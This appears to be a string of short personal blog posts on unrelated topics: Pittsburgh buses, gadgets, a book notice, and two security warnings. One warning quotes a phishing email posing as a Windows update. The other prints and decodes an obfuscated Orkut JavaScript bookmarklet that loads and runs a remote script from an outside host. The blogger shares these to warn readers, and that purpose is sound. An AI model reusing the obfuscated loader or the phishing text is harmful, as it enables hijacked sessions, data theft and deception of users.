Basically, the public transportation infrastructure in most cities will make seasoned Chennai/Mumbai travelers cringe in horror. (Well, not really, but I’ve seen more frequent 29C buses in Chennai than a 500 bus out here in Pittsburgh). You really need to have a car to get anywhere important.

Having said that, I must still comment that Pittsburgh has one of the best bus networks across the US. Like the Mumbai trains, the buses here follow a rigid schedule (well, mostly). You can pick up a schedule free of cost from any bus, the University Center on the Carnegie Mellon campus also has a number of bus schedules of all buses that pass in the vicinity of the university. These schedules give daily timings, along with major stop points and a map of the route. You can also go online to the website of the Port Authority of Allegheny County and enter your starting location and destination intersections, and the website will automatically give you a few routes which you can follow, along with the timings.

• Custom Time - Allows you to send e-mail with timestamps in the past. Hmm… considering mail headers can be spoofed, not particularly unique.
• Wake Up Kit - Guaranteed to make you wake up on time. I think I prefer Clocky…
• Yogurt - Use as directed to find friends online. And all this time, I was thinking yogurt was something you ate…

Dr. Gayathri Shrikanth, a renowned ophthalmologist in Chennai, has written a biography of the Superstar titled “The Name is Rajnikanth”. Due to release in Chennai on the 6th of March, it is priced at Rs. 495.

Read the full article here.

http://prabhukrish.net/2008/02/14/valentine-day-forward/

URGENT: Please intall critical Windows XP/2000/2003/Vista update!

Urgent Install Get critical update (obligatory)

Concerned about privacy? When you check for updates, basic information about your computer, not you, is used to determine which updates your programs need. To learn more, see our privacy statement.

Now, the only link present in the original e-mail was the “Get critical update (obligatory)” one. No link to the privacy statement. No link to a Microsoft Security Advisory, nothing. And that link was to another site designed to look exactly like the Microsoft Update website.

The scary thing is that this kind of e-mail is very effective. Most people who don’t have any clue of what is going on would just click on the button, resulting in an installation that would bring in viruses, Trojans, spyware, malware, etcetera, etcetera, etcetera.

That’s why there are a lot of warnings all over. Don’t click on any link in e-mail messages, even if you believe it to be true.

(Or better yet, use Linux)

The latest is a pretty interesting one…

javascript:eval(String.fromCharCode(100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 99, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 100, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 99, 41, 59, 99, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 99, 111, 111, 108, 112, 99, 115, 116, 117, 102, 102, 46, 103, 111, 111, 103, 108, 101, 112, 97, 103, 101, 115, 46, 99, 111, 109, 47, 114, 111, 100, 114, 105, 103, 111, 46, 117, 115, 101, 114, 46, 106, 115, 39, 59, 118, 111, 105, 100, 40, 48, 41))

The eval function of JavaScript takes a string and executes it as if it were JavaScript code. The String.fromCharCode function takes a series of numbers and converts it into their corresponding ASCII characters.

A simple one line C program reveals the string behind the integers (line breaks added for easy understanding):

d=document;
c=d.createElement('script');
d.body.appendChild(c);
c.src='http://coolpcstuff.googlepages.com/rodrigo.user.js';
void(0)


This is a pretty simple bit of code that appends the script located at the address shown above to the current document and executes it. Now, when I tried to get the script at the site, I get the message: This site has been disabled for violations of our Program Policies. .

A quick google search for the script file name yielded that the script simply floods your friends scrapbooks with the same message. Apparently harmless. The key word is apparently.

Now, I have a healthy dose of paranoia. I don’t trust any of these scripts unless I write them myself, or at least examine them myself. Now, I have tried to access some of the scripts directly (which should return the script source code without executing it), but the site gives me a permission denied (reason: hotlinking forbidden). That gives me all the more reason to suspect something is amiss.

I still don’t get it why people jump on scripts like this, when the orkut home page advertises (or at least used to) not to run any script when logged onto orkut. So, I’ll put out a simple security advisory.

Don’t run any script while logged into orkut (or for that matter, any website), no matter what it claims to do. For instance, one malicious script could always steal your personal information, even if you have hidden it from your friends. If a script can read your friends list, it can read anything.